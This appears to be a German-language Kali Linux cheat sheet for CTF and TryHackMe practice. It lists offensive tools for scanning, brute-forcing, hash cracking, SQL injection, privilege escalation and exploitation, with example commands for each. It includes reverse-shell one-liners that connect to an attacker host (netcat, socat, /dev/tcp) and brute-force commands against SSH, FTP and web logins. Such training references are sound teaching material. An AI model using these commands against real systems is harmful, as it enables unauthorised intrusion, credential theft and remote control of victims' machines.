🔐 Kali Linux · CTF / TryHackMe

ToolsSheet

Alle wichtigen Kali-Tools — Wann nutzen, Was kann es, Commands & Alternativen.

🔎

Recon & Scanning

Rustscan
👉 Wann nutzen?
  • Ganz am Anfang eines CTFs (schneller Portscan)
⚙️ Was kann das Tool?
  • Sehr schneller Port-Scanner
  • Übergabe an Nmap möglich
💻 Commands
rustscan -a <IP>
Schneller Standardscan 
rustscan -a <IP> --ulimit 5000
Mehr gleichzeitige Verbindungen 
rustscan -a <IP> -- -sC -sV
Nmap Scripts + Versionen
✅ Alternativen
  • Nmap
  • Masscan
Nmap
👉 Wann nutzen?
  • Nach Rustscan
  • Für detaillierte Analyse
⚙️ Was kann das Tool?
  • Service Detection
  • OS Detection
  • Scripts (NSE)
💻 Commands
nmap -sC -sV <IP>
Standardscan 
nmap -p- <IP>
Alle Ports scannen 
nmap -A <IP>
Aggressiver Scan 
nmap --script vuln <IP>
Schwachstellen suchen
✅ Alternativen
  • Rustscan
  • Masscan
Masscan
👉 Wann nutzen?
  • Große Netzwerke
  • Extrem schneller Scan nötig
⚙️ Was kann das Tool?
  • Scannt extrem schnell Ports
  • Ideal für /16 oder größere Netze
💻 Commands
masscan -p1-65535 <IP> --rate=1000
Alle Ports 
masscan -p80,443 <IP>
Bestimmte Ports 
masscan -p22 <IP> --rate=5000
Schneller gezielter Scan
✅ Alternativen
  • Rustscan
  • Nmap
🔑

Bruteforce

Hydra
👉 Wann nutzen?
  • Login Bruteforce (SSH, FTP, HTTP)
⚙️ Was kann das Tool?
  • Multi-Protokoll Bruteforce
  • Unterstützt SSH, FTP, HTTP, SMB und mehr
💻 Commands
hydra -l admin -P rockyou.txt <IP> ssh
SSH Bruteforce 
hydra -L users.txt -P passwords.txt <IP> ftp
FTP Multi-User 
hydra -l admin -P rockyou.txt <IP> http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
Web Login
✅ Alternativen
  • Medusa
  • Ncrack
Medusa
👉 Wann nutzen?
  • Große Wordlists
  • Stabilere Alternative zu Hydra
⚙️ Was kann das Tool?
  • Schneller paralleler Bruteforce
  • Unterstützt viele Protokolle
💻 Commands
medusa -h <IP> -u admin -P rockyou.txt -M ssh
SSH Bruteforce 
medusa -h <IP> -U users.txt -P passwords.txt -M ftp
FTP Multi-User 
medusa -h <IP> -u admin -P rockyou.txt -M http
HTTP Bruteforce
✅ Alternativen
  • Hydra
  • Ncrack
Ncrack
👉 Wann nutzen?
  • Viele Hosts gleichzeitig
⚙️ Was kann das Tool?
  • Sehr effizient bei Netzwerk-Angriffen
  • Nmap-Syntax kompatibel
💻 Commands
ncrack -p ssh <IP> -u admin -P rockyou.txt
SSH Crack 
ncrack -p ftp <IP> --user admin --pass wordlist.txt
FTP Crack 
ncrack -p ssh,ftp <IP>
Multi-Protokoll
✅ Alternativen
  • Hydra
  • Medusa
Burp Suite
👉 Wann nutzen?
  • Web Login Analyse
  • Komplexe Authentifizierung
⚙️ Was kann das Tool?
  • Requests abfangen & manipulieren
  • Bruteforce mit Intruder
  • Aktiver & passiver Scanner
💻 Commands
1. Proxy aktivieren → Request abfangen
2. Send to Intruder → Payload § setzen
3. Wordlist laden → Attack → Antworten vergleichen
Status/Länge prüfen
✅ Alternativen
  • OWASP ZAP
  • FFUF
🔓

Password Cracking

John the Ripper
👉 Wann nutzen?
  • Offline Hashes cracken
⚙️ Was kann das Tool?
  • Dictionary + Rule Attacks
  • Viele Hash-Typen unterstützt
💻 Commands
john hash.txt
Standard Crack 
john --wordlist=rockyou.txt hash.txt
Wordlist Angriff 
john --show hash.txt
Gecrackte Passwörter anzeigen
✅ Alternativen
  • Hashcat (GPU, schneller)
Hashcat
👉 Wann nutzen?
  • Große Hashes / GPU verfügbar
⚙️ Was kann das Tool?
  • Extrem schneller GPU-Cracker
  • 300+ Hash-Typen
💻 Commands
hashcat -m 0 hash.txt rockyou.txt
MD5 Crack 
hashcat -a 3 -m 0 hash.txt ?a?a?a?a
Brute-Force Modus 
hashcat --show hash.txt
Ergebnisse anzeigen
✅ Alternativen
  • John the Ripper
🌐

Web Exploitation

SQLMap
👉 Wann nutzen?
  • SQL Injection vermutet
⚙️ Was kann das Tool?
  • Automatisiert SQLi Erkennung
  • Datenbank-Dump
  • Shell-Zugriff möglich
💻 Commands
sqlmap -u "<URL>" --dbs
Datenbanken anzeigen 
sqlmap -u "<URL>" --tables
Tabellen anzeigen 
sqlmap -u "<URL>" --dump
Daten extrahieren
✅ Alternativen
  • Burp Suite
  • Manual Testing
Gobuster
👉 Wann nutzen?
  • Verzeichnisse finden
⚙️ Was kann das Tool?
  • Directory & File Bruteforce
  • DNS Subdomain Enumeration
💻 Commands
gobuster dir -u http://<IP> -w wordlist.txt
Directory Bruteforce 
gobuster dir -u http://<IP> -w wordlist.txt -x php,html
Mit Dateiendungen 
gobuster dns -d domain.com -w wordlist.txt
DNS Subdomains
✅ Alternativen
  • FFUF
  • Dirsearch
FFUF
👉 Wann nutzen?
  • Schnelles Web Fuzzing
⚙️ Was kann das Tool?
  • Parameter & Directory Bruteforce
  • Sehr flexibel filterbar
💻 Commands
ffuf -u http://<IP>/FUZZ -w wordlist.txt
Pfade finden 
ffuf -u http://<IP>/FUZZ -w wordlist.txt -fc 404
404er ausfiltern 
ffuf -u http://<IP>/index.php?FUZZ=test -w params.txt
Parameter fuzzen
✅ Alternativen
  • Gobuster
  • Burp Intruder
Nikto
👉 Wann nutzen?
  • Schneller Webscan
⚙️ Was kann das Tool?
  • Findet bekannte Schwachstellen
  • Checks für Fehlkonfigurationen
💻 Commands
nikto -h http://<IP>
Standard Scan 
nikto -h <IP> -p 80,443
Mehrere Ports 
nikto -h http://<IP> -Tuning x
Erweiterte Prüfungen
✅ Alternativen
  • Nmap Scripts
  • Burp
🖧

Shells & Networking

Netcat
👉 Wann nutzen?
  • Reverse Shells
  • Debugging
⚙️ Was kann das Tool?
  • TCP/UDP Kommunikation
  • Listener für Shells
  • File Transfer
💻 Commands
nc -lvnp 4444
Listener starten 
nc <IP> 4444
Verbinden 
nc -e /bin/bash <IP> 4444
Bash Shell senden
✅ Alternativen
  • Socat
Socat
👉 Wann nutzen?
  • Stabilere Shells als Netcat
⚙️ Was kann das Tool?
  • Erweiterte Netzwerkverbindungen
  • Vollständige TTY möglich
💻 Commands
socat TCP-LISTEN:4444 EXEC:/bin/bash
Listener 
socat TCP:<IP>:4444 EXEC:/bin/bash
Verbinden 
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
Mit Fork
✅ Alternativen
  • Netcat
Reverse Shell
👉 Wann nutzen?
  • Nach erfolgreichem Exploit
⚙️ Was kann das Tool?
  • Verbindung zurück zum Angreifer
  • Umgeht Firewalls (outbound)
💻 Commands
bash -i >& /dev/tcp/<IP>/4444 0>&1
Bash Reverse Shell 
python3 -c 'import pty;pty.spawn("/bin/bash")'
Shell stabilisieren
✅ Alternativen
  • revshells.com (Generator)
  • Metasploit meterpreter
🧠

Privilege Escalation

LinPEAS
👉 Wann nutzen?
  • Direkt nach initialer Shell
⚙️ Was kann das Tool?
  • Automatische PrivEsc Checks
  • SUID, Cron, Sudo, Capabilities
💻 Commands
./linpeas.sh
Vollscan starten 
chmod +x linpeas.sh
Ausführbar machen 
./linpeas.sh | tee output.txt
Output speichern
✅ Alternativen
  • LinEnum
  • linux-smart-enumeration (lse.sh)
Sudo / SUID
👉 Wann nutzen?
  • Immer direkt nach Shell
⚙️ Was kann das Tool?
  • Sudo-Rechte prüfen
  • SUID-Binaries → GTFOBins
💻 Commands
sudo -l
Sudo Rechte anzeigen 
find / -perm -4000 -type f 2>/dev/null
SUID Files finden 
cat /etc/crontab
Cronjobs prüfen
✅ Alternativen
  • GTFOBins (gtfobins.github.io)
📂

File Transfer

Python HTTP Server
👉 Wann nutzen?
  • Dateien auf Zielsystem übertragen
⚙️ Was kann das Tool?
  • Lokaler Webserver in einer Zeile
  • Dateien per wget/curl abrufbar
💻 Commands
python3 -m http.server 8000
Server starten 
python3 -m http.server 80
Port 80 
python3 -m http.server --bind 0.0.0.0 8000
Alle Interfaces
✅ Alternativen
  • Netcat
  • SCP
Wget / Curl
👉 Wann nutzen?
  • Dateien herunterladen
⚙️ Was kann das Tool?
  • Dateien von HTTP/FTP laden
  • Curl für HTTP-Requests
💻 Commands
wget http://<IP>:8000/file
Datei laden 
curl http://<IP>:8000/file -o file
Mit curl 
curl -O http://<IP>:8000/file
Original-Name behalten
✅ Alternativen
  • FTP
  • SCP
🔍

Enumeration Services

SMB
👉 Wann nutzen?
  • Port 445 offen
⚙️ Was kann das Tool?
  • Shares anzeigen
  • Dateien lesen/schreiben
  • Lateral Movement
💻 Commands
smbclient -L //<IP> -N
Shares anzeigen 
smbmap -H <IP>
Shares + Rechte 
enum4linux <IP>
Vollständige SMB Enum
✅ Alternativen
  • CrackMapExec
SNMP
👉 Wann nutzen?
  • Port 161 offen
⚙️ Was kann das Tool?
  • System-Infos auslesen
  • Oft unterschätzt → viele Infos
💻 Commands
snmpwalk -c public -v1 <IP>
SNMP Daten lesen 
snmp-check <IP>
Formatierter Output 
onesixtyone -c community.txt <IP>
Community String bruten
✅ Alternativen
  • Nmap SNMP Scripts
🧰

Exploitation

Searchsploit
👉 Wann nutzen?
  • Nach Nmap Scan
  • Exploit suchen
⚙️ Was kann das Tool?
  • Lokale Exploit-DB Suche
  • Offline nutzbar
💻 Commands
searchsploit apache
Exploits suchen 
searchsploit -x exploit
Exploit anzeigen 
searchsploit -m exploit
Exploit kopieren
✅ Alternativen
  • Exploit-DB (online)
Metasploit
👉 Wann nutzen?
  • Wenn Exploit existiert
⚙️ Was kann das Tool?
  • Exploit Framework
  • Meterpreter Sessions
  • Post-Exploitation
💻 Commands
msfconsole
Framework starten 
search <exploit>
Exploit suchen 
use exploit/...
Exploit laden 
set RHOSTS <IP> && run
Konfigurieren und ausführen
✅ Alternativen
  • Manual Exploit